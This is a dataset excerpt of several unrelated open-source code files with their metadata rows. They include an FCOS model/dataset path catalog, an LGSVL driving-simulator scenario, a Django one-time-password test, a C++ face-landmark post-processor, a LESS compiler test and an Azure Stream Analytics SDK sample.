        "*_cocostyle" entries) map to ``COCODataset``; the remaining VOC
        entries map to ``PascalVOCDataset``.

        Raises:
            RuntimeError: if ``name`` is not in ``DATASETS`` or matches
                neither dataset family.
        """
        attrs = DatasetCatalog.DATASETS.get(name)
        if attrs is None:
            raise RuntimeError("Dataset not available: {}".format(name))
        data_dir = DatasetCatalog.DATA_DIR
        # Checked first: "voc_*_cocostyle" entries are COCO-format too.
        if "coco" in name:
            args = dict(
                root=os.path.join(data_dir, attrs["img_dir"]),
                ann_file=os.path.join(data_dir, attrs["ann_file"]),
            )
            return dict(
                factory="COCODataset",
                args=args,
            )
        if "voc" in name:
            args = dict(
                data_dir=os.path.join(data_dir, attrs["data_dir"]),
                split=attrs["split"],
            )
            return dict(
                factory="PascalVOCDataset",
                args=args,
            )
        raise RuntimeError("Dataset not available: {}".format(name))
class ModelCatalog(object):
    """Resolves symbolic model identifiers to Detectron S3 download URLs.

    Two families are supported:

    * ``ImageNetPretrained/<short-name>`` -- ImageNet-pretrained backbones.
    * ``Caffe2Detectron/COCO/<model_id>/<model_name>`` -- Detectron C2
      12_2017 baseline checkpoints.
    """

    S3_C2_DETECTRON_URL = "https://dl.fbaipublicfiles.com/detectron"
    C2_IMAGENET_MODELS = {
        "MSRA/R-50": "ImageNetPretrained/MSRA/R-50.pkl",
        "MSRA/R-50-GN": "ImageNetPretrained/47261647/R-50-GN.pkl",
        "MSRA/R-101": "ImageNetPretrained/MSRA/R-101.pkl",
        "MSRA/R-101-GN": "ImageNetPretrained/47592356/R-101-GN.pkl",
        "FAIR/20171220/X-101-32x8d": "ImageNetPretrained/20171220/X-101-32x8d.pkl",
        "FAIR/20171220/X-101-64x4d": "ImageNetPretrained/20171220/X-101-64x4d.pkl",
    }
    C2_DETECTRON_SUFFIX = "output/train/{}coco_2014_train%3A{}coco_2014_valminusminival/generalized_rcnn/model_final.pkl"
    C2_DETECTRON_MODELS = {
        "35857197/e2e_faster_rcnn_R-50-C4_1x": "01_33_49.iAX0mXvW",
        "35857345/e2e_faster_rcnn_R-50-FPN_1x": "01_36_30.cUF7QR7I",
        "35857890/e2e_faster_rcnn_R-101-FPN_1x": "01_38_50.sNxI7sX7",
        "36761737/e2e_faster_rcnn_X-101-32x8d-FPN_1x": "06_31_39.5MIHi1fZ",
        "35858791/e2e_mask_rcnn_R-50-C4_1x": "01_45_57.ZgkA7hPB",
        "35858933/e2e_mask_rcnn_R-50-FPN_1x": "01_48_14.DzEQe4wC",
        "35861795/e2e_mask_rcnn_R-101-FPN_1x": "02_31_37.KqyEK4tT",
        "36761843/e2e_mask_rcnn_X-101-32x8d-FPN_1x": "06_35_59.RZotkLKI",
        "37129812/e2e_mask_rcnn_X-152-32x8d-FPN-IN5k_1.44x": "09_35_36.8pzTQKYK",
        # keypoints
        "37697547/e2e_keypoint_rcnn_R-50-FPN_1x": "08_42_54.kdzV35ao"
    }

    @staticmethod
    def get(name):
        """Dispatch on the identifier prefix; raise for unknown prefixes."""
        if name.startswith("Caffe2Detectron/COCO"):
            return ModelCatalog.get_c2_detectron_12_2017_baselines(name)
        if name.startswith("ImageNetPretrained"):
            return ModelCatalog.get_c2_imagenet_pretrained(name)
        raise RuntimeError("model not present in the catalog {}".format(name))

    @staticmethod
    def get_c2_imagenet_pretrained(name):
        """Map ``ImageNetPretrained/<short-name>`` to its S3 URL."""
        # Strip the catalog prefix, then look up the S3-relative path.
        short_name = name[len("ImageNetPretrained/"):]
        s3_path = ModelCatalog.C2_IMAGENET_MODELS[short_name]
        return "/".join([ModelCatalog.S3_C2_DETECTRON_URL, s3_path])

    @staticmethod
    def get_c2_detectron_12_2017_baselines(name):
        """Map a Detectron C2 baseline identifier to its S3 URL.

        Checkpoints are stored as
        ``prefix/<model_id>/12_2017_baselines/<model_name>.yaml.<signature>/<suffix>``,
        where the suffix embeds a ``keypoints_`` tag for keypoint models.
        """
        dataset_tag = "keypoints_" if "keypoint" in name else ""
        suffix = ModelCatalog.C2_DETECTRON_SUFFIX.format(dataset_tag, dataset_tag)
        # Drop the identification prefix, leaving "<model_id>/<model_name>".
        ident = name[len("Caffe2Detectron/COCO/"):]
        model_id, model_name = ident.split("/")
        # The stored object name is "<model_name>.yaml.<signature>".
        unique_name = ".".join(["{}.yaml".format(model_name),
                                ModelCatalog.C2_DETECTRON_MODELS[ident]])
        return "/".join([ModelCatalog.S3_C2_DETECTRON_URL, model_id,
                         "12_2017_baselines", unique_name, suffix])
|
Python
|
BSD-2-Clause
|
choasup/FCOS/fcos_core/config/paths_catalog.py
|
7de11895-15ad-4673-b987-65152080dda6
|
[]
|
[]
|
#!/usr/bin/env python3
#
# Copyright (c) 2019 LG Electronics, Inc.
#
# This software contains code licensed as described in LICENSE.
#
import os
import lgsvl
import random
import time
from pathlib import Path
import json
# Connect to the LGSVL simulator (host overridable via SIMULATOR_HOST).
sim = lgsvl.Simulator(os.environ.get("SIMULATOR_HOST", "127.0.0.1"), 8181)

# Raycast layer mask: bit 0 selects the road (default) layer.
layer_mask = 0
layer_mask |= 1 << 0  # 0 is the layer for the road (default)

# Load the SanFrancisco map, or just reset it if it is already active.
if sim.current_scene == "SanFrancisco":
    sim.reset()
else:
    sim.load("SanFrancisco")

# if sim.current_scene == "Testbed":
#   sim.reset()
# else:
#   sim.load("Testbed")

# Ego spawn pose: hand-tuned position/heading on the SanFrancisco map.
spawns = sim.get_spawn()
spawns[0].position.x = 705.6
spawns[0].position.y = 10.1
spawns[0].position.z = -308.7
spawns[0].rotation.y -= 95

# Basis vectors of the spawn frame, used to place NPCs relative to the ego.
forward = lgsvl.utils.transform_to_forward(spawns[0])
right = lgsvl.utils.transform_to_right(spawns[0])

state = lgsvl.AgentState()
# state.transform.position = spawns[0].position
state.transform.position = spawns[0].position
state.transform.rotation = spawns[0].rotation
ego = sim.add_agent("SingleLiDAR (Autoware)", lgsvl.AgentType.EGO, state)

# Connect the ego to the Autoware bridge (host overridable via BRIDGE_HOST).
ego.connect_bridge(os.environ.get("BRIDGE_HOST", "127.0.0.1"), 9090)

#------- Stand vehicle -------#
#set stand vehicle's initial position
# (x, y) offsets from the spawn point: x along `right`, y along `forward`.
pose_arr = [
    (-3, 5),
    (-3, 10),
    (-3, 15),
    (-3, 20),
    (-5, 25),
    (3, 30),
    (-1, 40),
    (-6, 33)
]
sv_state_arr = []
# Place one parked Sedan NPC at each offset.
for (x, y) in pose_arr:
    sv_state_arr.append(lgsvl.AgentState())
    sv_state_arr[-1].transform.position = spawns[0].position + y * forward + x * right
    sv_state_arr[-1].transform.rotation = spawns[0].rotation
    _ = sim.add_agent("Sedan", lgsvl.AgentType.NPC, sv_state_arr[-1])

# for i in range(30):
#     sv_state_arr.append(lgsvl.AgentState())
#     sv_state_arr[-1].transform.position = spawns[0].position + (150 + i * 7) * forward + 3.5 * right
#     sv_state_arr[-1].transform.rotation = spawns[0].rotation
#     _ = sim.add_agent("Sedan", lgsvl.AgentType.NPC, sv_state_arr[-1])

# for i in range(30):
#     sv_state_arr.append(lgsvl.AgentState())
#     sv_state_arr[-1].transform.position = spawns[0].position + (150 + i * 7) * forward - 6 * right
#     sv_state_arr[-1].transform.rotation = spawns[0].rotation
#     _ = sim.add_agent("Sedan", lgsvl.AgentType.NPC, sv_state_arr[-1])

# Run the simulation until externally stopped.
sim.run()
|
Python
|
MIT
|
rubis-lab/Autoware_NDT/autoware.ai/autoware_files/lgsvl_file/scripts/testbed_scenario/sanfrancisco.py
|
06f8e4e5-9395-407b-a644-4ea5e776143e
|
[{"tag": "IP_ADDRESS", "value": "127.0.0.1", "start": 279, "end": 288, "context": "lgsvl.Simulator(os.environ.get(\"SIMULATOR_HOST\", \"127.0.0.1\"), 8181)\n\nlayer_mask = 0\nlayer_mask |= 1 << 0 # "}, {"tag": "IP_ADDRESS", "value": "127.0.0.1", "start": 1089, "end": 1098, "context": "ego.connect_bridge(os.environ.get(\"BRIDGE_HOST\", \"127.0.0.1\"), 9090)\n\n\n#------- Stand vehicle -------#\n#set s"}]
|
[{"tag": "IP_ADDRESS", "value": "127.0.0.1", "start": 279, "end": 288, "context": "lgsvl.Simulator(os.environ.get(\"SIMULATOR_HOST\", \"127.0.0.1\"), 8181)\n\nlayer_mask = 0\nlayer_mask |= 1 << 0 # "}, {"tag": "IP_ADDRESS", "value": "127.0.0.1", "start": 1089, "end": 1098, "context": "ego.connect_bridge(os.environ.get(\"BRIDGE_HOST\", \"127.0.0.1\"), 9090)\n\n\n#------- Stand vehicle -------#\n#set s"}]
|
from datetime import timedelta
import pytest
from django.utils import timezone
from electeez_auth.models import User
@pytest.mark.django_db
def test_otp(client):
    # One-time-password login links: a token redirects to its target on
    # first use only, and an expired token never redirects there.
    user = User.objects.create(email='otp@example.com')
    token = user.otp_new(redirect='valid')
    response = client.post(token.path)
    # First use: redirected to the requested target.
    assert response['Location'] == 'valid'
    # can't use the link twice
    response = client.post(token.path)
    assert response['Location'] != 'valid'
    # try expired link
    token = user.otp_new()
    # Force the expiry timestamp into the past before using the token.
    token.otp_expiry = timezone.now() - timedelta(minutes=1)
    token.save()
    response = client.post(token.path)
    assert response['Location'] != 'valid'
|
Python
|
MIT
|
Joneswn/Baloti/electeez_auth/test_otp.py
|
3b26d026-e755-420c-8b6b-4b0c157cd142
|
[]
|
[]
|
/**
* Copyright (c) 2019 Horizon Robotics. All rights reserved.
* @File: LmkPosePostPredictor.cpp
* @Brief: definition of the LmkPosePostPredictor
* @Author: zhengzheng.ge
* @Email: zhengzheng.ge@horizon.ai
* @Date: 2019-07-17 14:27:05
* @Last Modified by: zhengzheng.ge
* @Last Modified time: 2019-07-17 15:18:10
*/
#include "CNNMethod/PostPredictor/LmkPosePostPredictor.h"
#include <vector>
#include "CNNMethod/CNNConst.h"
#include "CNNMethod/util/util.h"
#include "hobotlog/hobotlog.hpp"
#include "hobotxstream/profiler.h"
namespace xstream {
// Post-process one CNN run: for every batch, decode landmark/pose results
// for each detected box and append them to run_data->output, one
// BaseDataVector per output slot.
void LmkPosePostPredictor::Do(CNNMethodRunData *run_data) {
  int batch_size = run_data->input_dim_size.size();
  run_data->output.resize(batch_size);
  for (int batch_idx = 0; batch_idx < batch_size; batch_idx++) {
    int dim_size = run_data->input_dim_size[batch_idx];
    auto &mxnet_output = run_data->mxnet_output[batch_idx];
    std::vector<BaseDataPtr> &batch_output = run_data->output[batch_idx];
    batch_output.resize(output_slot_size_);
    // One result vector per output slot; per-box results are appended below.
    for (int i = 0; i < output_slot_size_; i++) {
      auto base_data_vector = std::make_shared<BaseDataVector>();
      batch_output[i] = std::static_pointer_cast<BaseData>(base_data_vector);
    }
    {
      RUN_PROCESS_TIME_PROFILER(model_name_ + "_post");
      RUN_FPS_PROFILER(model_name_ + "_post");
      // Input slot 0 carries the detection boxes for this batch.
      auto boxes = std::static_pointer_cast<BaseDataVector>(
          (*(run_data->input))[batch_idx][0]);
      for (int dim_idx = 0; dim_idx < dim_size; dim_idx++) {
        std::vector<BaseDataPtr> output;
        auto xstream_box = std::static_pointer_cast<XStreamData<
            hobot::vision::BBox>>(boxes->datas_[dim_idx]);
        HandleLmkPose(mxnet_output[dim_idx], xstream_box->value,
                      run_data->real_nhwc, &output);
        // Scatter this box's results into the per-slot output vectors.
        for (int i = 0; i < output_slot_size_; i++) {
          auto base_data_vector =
              std::static_pointer_cast<BaseDataVector>(batch_output[i]);
          base_data_vector->datas_.push_back(output[i]);
        }
      }
    }
  }
}
// Decode one box's raw CNN layers into two results: landmarks (slot 0)
// followed by head pose (slot 1).  Missing layers yield results flagged
// DataState::INVALID so downstream slots stay aligned.
void LmkPosePostPredictor::HandleLmkPose(
    const std::vector<std::vector<int8_t>> &mxnet_outs,
    const hobot::vision::BBox &box,
    const std::vector<std::vector<uint32_t>> &nhwc,
    std::vector<BaseDataPtr> *output) {
  // Helper: append a Pose3D result flagged INVALID.
  auto push_invalid_pose = [output]() {
    auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
    pose->state_ = DataState::INVALID;
    output->push_back(std::static_pointer_cast<BaseData>(pose));
  };

  if (mxnet_outs.empty()) {
    // No model output at all: INVALID landmarks, then INVALID pose.
    auto landmarks = std::make_shared<XStreamData<hobot::vision::Landmarks>>();
    landmarks->state_ = DataState::INVALID;
    output->push_back(std::static_pointer_cast<BaseData>(landmarks));
    push_invalid_pose();
    return;
  }

  // Slot 0: landmarks decoded from the score/coordinate layers.
  output->push_back(LmkPostPro(mxnet_outs, box, nhwc));

  if (mxnet_outs.size() > 3) {
    // Slot 1: pose regressed from the fourth output layer.
    output->push_back(PosePostPro(mxnet_outs[3]));
  } else {
    push_invalid_pose();
  }
}
// Decode the 5-point landmark heatmap outputs for one box.
//
// mxnet_outs[0]: per-cell scores, laid out n/h/w/c per nhwc[0].
// mxnet_outs[1]: per-cell coordinate regressions (2 floats per point).
// mxnet_outs[2] (optional): whole-box fallback regression, used for any
//   point that received no above-threshold votes.
// The votes for each point are averaged, then mapped from the 64x64
// (16 * STRIDE) model window into the given box's coordinates.
BaseDataPtr LmkPosePostPredictor::LmkPostPro(
    const std::vector<std::vector<int8_t>> &mxnet_outs,
    const hobot::vision::BBox &box,
    const std::vector<std::vector<uint32_t>> &nhwc) {
  static const float SCORE_THRESH = 0.0;
  static const float REGRESSION_RADIUS = 3.0;
  static const float STRIDE = 4.0;
  static const float num = 1;        // batch dimension, always 1 here
  static const float height_m = 16;  // heatmap height
  static const float width_m = 16;   // heatmap width
  auto fl_scores = reinterpret_cast<const float *>(mxnet_outs[0].data());
  auto fl_coords = reinterpret_cast<const float *>(mxnet_outs[1].data());
  // Per-landmark vote accumulators (5 points).
  std::vector<std::vector<float>> points_score;
  std::vector<std::vector<float>> points_x;
  std::vector<std::vector<float>> points_y;
  points_score.resize(5);
  points_x.resize(5);
  points_y.resize(5);
  // nhwc, 1x16x16x5, 1x16x16x10
  for (int n = 0; n < num; ++n) {  // n
    for (int i = 0; i < height_m; ++i) {  // h
      for (int j = 0; j < width_m; ++j) {  // w
        int index_score = n * nhwc[0][1] * nhwc[0][2] * nhwc[0][3] +
                          i * nhwc[0][2] * nhwc[0][3] + j * nhwc[0][3];
        // NOTE(review): the first factor mixes nhwc[1] and nhwc[0][3];
        // harmless because n is always 0, but looks like it was meant to
        // be nhwc[1][3] — confirm before reusing with num > 1.
        int index_coords = n * nhwc[1][1] * nhwc[1][2] * nhwc[0][3] +
                           i * nhwc[1][2] * nhwc[1][3] + j * nhwc[1][3];
        for (int k = 0; k < 5; ++k) {  // c
          auto score = fl_scores[index_score + k];
          if (score > SCORE_THRESH) {
            points_score[k].push_back(score);
            // Cell centre minus the scaled regression offset, clamped to
            // the 64x64 model window.
            float x = (j + 0.5 -
                       fl_coords[index_coords + 2 * k] * REGRESSION_RADIUS) *
                      STRIDE;
            float y =
                (i + 0.5 -
                 fl_coords[index_coords + 2 * k + 1] * REGRESSION_RADIUS) *
                STRIDE;
            x = std::min(std::max(x, 0.0f), width_m * STRIDE);
            y = std::min(std::max(y, 0.0f), height_m * STRIDE);
            points_x[k].push_back(x);
            points_y[k].push_back(y);
          }
        }
      }
    }
  }
  auto landmarks = std::make_shared<XStreamData<hobot::vision::Landmarks>>();
  landmarks->value.values.resize(5);
  for (int i = 0; i < 5; ++i) {
    auto &poi = landmarks->value.values[i];
    // Average the votes, then map from model window into box coordinates.
    poi.x = Mean(points_x[i]);
    poi.y = Mean(points_y[i]);
    poi.x = box.x1 + poi.x / 64 * (box.x2 - box.x1);
    poi.y = box.y1 + poi.y / 64 * (box.y2 - box.y1);
    // Score = vote count; zero votes triggers the fallback regression.
    poi.score = static_cast<float>(points_score[i].size());
    if (poi.score <= 0.000001 && mxnet_outs.size() > 2) {
      auto reg_coords = reinterpret_cast<const float *>(mxnet_outs[2].data());
      poi.x = box.x1 + reg_coords[i << 1] * (box.x2 - box.x1);
      poi.y = box.y1 + reg_coords[(i << 1) + 1] * (box.y2 - box.y1);
    }
  }
  return std::static_pointer_cast<BaseData>(landmarks);
}
// Decode the pose regression layer: three raw floats, each scaled by 90
// to yield yaw/pitch/roll (presumably in degrees — TODO confirm).
BaseDataPtr LmkPosePostPredictor::PosePostPro(
    const std::vector<int8_t> &mxnet_outs) {
  static constexpr double kAngleScale = 90.0;
  const float *raw = reinterpret_cast<const float *>(mxnet_outs.data());
  auto result = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
  result->value.yaw = raw[0] * kAngleScale;
  result->value.pitch = raw[1] * kAngleScale;
  result->value.roll = raw[2] * kAngleScale;
  return std::static_pointer_cast<BaseData>(result);
}
} // namespace xstream
|
C++
|
BSD-2-Clause
|
robort-yuan/AI-EXPRESS/source/common/xstream/methods/cnnmethod/src/PostPredictor/LmkPosePostPredictor.cpp
|
42452bcf-d929-4113-a274-1add744b7985
|
[{"tag": "EMAIL", "value": "zhengzheng.ge@horizon.ai", "start": 187, "end": 211, "context": "ostPredictor\n * @Author: zhengzheng.ge\n * @Email: zhengzheng.ge@horizon.ai\n * @Date: 2019-07-17 14:27:05\n * @Last Modified b"}]
|
[{"tag": "EMAIL", "value": "zhengzheng.ge@horizon.ai", "start": 187, "end": 211, "context": "ostPredictor\n * @Author: zhengzheng.ge\n * @Email: zhengzheng.ge@horizon.ai\n * @Date: 2019-07-17 14:27:05\n * @Last Modified b"}]
|
/*
* Copyright 2011 <a href="mailto:lincolnbaxter@gmail.com">Lincoln Baxter, III</a>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.ocpsoft.rewrite.transform.less;
import static org.junit.Assert.assertEquals;
import org.junit.Test;
import org.ocpsoft.rewrite.transform.less.Less;
/**
 * Unit tests for the {@link Less} transform: compiles small LESS snippets
 * and compares the resulting CSS ignoring case and whitespace.
 */
public class LessTest
{

   /** Arithmetic inside a rule ({@code 1 + 1}) is evaluated by the compiler. */
   @Test
   public void testCalculation()
   {
      String input = ".class { width: 1 + 1 }";
      String output = Less.compiler().transform(null, input);
      assertSameCSS(".class { width: 2; }", output);
   }

   /** A LESS variable ({@code @nice-blue}) is substituted where referenced. */
   @Test
   public void testVariables()
   {
      String input = "@nice-blue: #5B83AD;\n.myblue{ color: @nice-blue; }";
      String output = Less.compiler().transform(null, input);
      assertSameCSS(".myblue { color: #5B83AD; }", output);
   }

   /** Mixing {@code .bordered} into {@code .navigation} copies its declarations. */
   @Test
   public void testMixins()
   {
      String input = ".bordered { border: 1px solid red; }\n.navigation { .bordered }\n";
      String output = Less.compiler().transform(null, input);
      assertSameCSS(".bordered{ border: 1px solid red; }\n.navigation{ border: 1px solid red; }\n", output);
   }

   /** Asserts CSS equality after normalization (see {@link #normalize}). */
   private static void assertSameCSS(String expected, String actual)
   {
      assertEquals(normalize(expected), normalize(actual));
   }

   /** Lower-cases and strips all whitespace so formatting differences are ignored. */
   private static String normalize(String s)
   {
      return s.toLowerCase().replaceAll("\\s+", "");
   }
}
|
Java
|
Apache-2.0
|
Tobisaninfo/rewrite/transform-less/src/test/java/org/ocpsoft/rewrite/transform/less/LessTest.java
|
f704423d-7e72-4327-a96a-eb41dbcd0270
|
[{"tag": "NAME", "value": "Lincoln Baxter", "start": 62, "end": 76, "context": "ght 2011 <a href=\"mailto:lincolnbaxter@gmail.com\">Lincoln Baxter, III</a>\n * \n * Licensed under the Apache License"}, {"tag": "EMAIL", "value": "lincolnbaxter@gmail.com", "start": 37, "end": 60, "context": "/*\n * Copyright 2011 <a href=\"mailto:lincolnbaxter@gmail.com\">Lincoln Baxter, III</a>\n * \n * Licensed under th"}]
|
[{"tag": "NAME", "value": "Lincoln Baxter", "start": 62, "end": 76, "context": "ght 2011 <a href=\"mailto:lincolnbaxter@gmail.com\">Lincoln Baxter, III</a>\n * \n * Licensed under the Apache License"}, {"tag": "EMAIL", "value": "lincolnbaxter@gmail.com", "start": 37, "end": 60, "context": "/*\n * Copyright 2011 <a href=\"mailto:lincolnbaxter@gmail.com\">Lincoln Baxter, III</a>\n * \n * Licensed under th"}]
|
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.42000
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
using System;
using System.Reflection;
[assembly: System.Reflection.AssemblyCompanyAttribute("CorporateUniversityLibrary")]
[assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")]
[assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")]
[assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")]
[assembly: System.Reflection.AssemblyProductAttribute("CorporateUniversityLibrary")]
[assembly: System.Reflection.AssemblyTitleAttribute("CorporateUniversityLibrary")]
[assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")]
// Generated by the MSBuild WriteCodeFragment class.
|
C#
|
MIT
|
Krishna143-cog/DotNETSamples/CorporateUniversity/CorporateUniversityLibrary/obj/Debug/netstandard2.0/CorporateUniversityLibrary.AssemblyInfo.cs
|
c93fcf73-d78e-4b75-bae0-dec60cf37ee8
|
[]
|
[]
|
Read the [SDK documentation](https://github.com/Azure/azure-sdk-for-java/blob/azure-resourcemanager-streamanalytics_1.0.0-beta.2/sdk/streamanalytics/azure-resourcemanager-streamanalytics/README.md) on how to add the SDK to your project and authenticate.
```java
import com.azure.resourcemanager.streamanalytics.models.ClusterSku;
import com.azure.resourcemanager.streamanalytics.models.ClusterSkuName;
import java.util.HashMap;
import java.util.Map;
/** Samples for Clusters CreateOrUpdate. */
public final class Main {
/*
* x-ms-original-file: specification/streamanalytics/resource-manager/Microsoft.StreamAnalytics/stable/2020-03-01/examples/Cluster_Create.json
*/
/**
* Sample code: Create a new cluster.
*
* @param manager Entry point to StreamAnalyticsManager.
*/
public static void createANewCluster(com.azure.resourcemanager.streamanalytics.StreamAnalyticsManager manager) {
manager
.clusters()
.define("An Example Cluster")
.withRegion("North US")
.withExistingResourceGroup("sjrg")
.withTags(mapOf("key", "value"))
.withSku(new ClusterSku().withName(ClusterSkuName.DEFAULT).withCapacity(48))
.create();
}
@SuppressWarnings("unchecked")
private static <T> Map<String, T> mapOf(Object... inputs) {
Map<String, T> map = new HashMap<>();
for (int i = 0; i < inputs.length; i += 2) {
String key = (String) inputs[i];
T value = (T) inputs[i + 1];
map.put(key, value);
}
return map;
}
}
```
|
Markdown
|
MIT
|
Azure/azure-rest-api-specs-examples/specification/streamanalytics/resource-manager/Microsoft.StreamAnalytics/stable/2020-03-01/examples-java/Cluster_Create.md
|
c0a453f3-322c-4864-ae20-f29ff2e9ddc5
|
[]
|
[]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.